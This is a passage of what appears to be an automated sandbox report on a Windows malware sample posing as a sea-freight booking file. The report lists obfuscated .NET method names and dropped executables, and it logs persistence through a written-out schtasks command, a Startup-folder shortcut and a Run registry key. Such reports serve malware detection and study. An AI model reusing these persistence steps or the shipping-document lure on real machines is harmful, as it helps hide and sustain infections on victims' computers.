'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'

Creates processes with suspicious names

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe			Jump to dropped file
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: C:\Users\user\AppData\Local\XClient.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
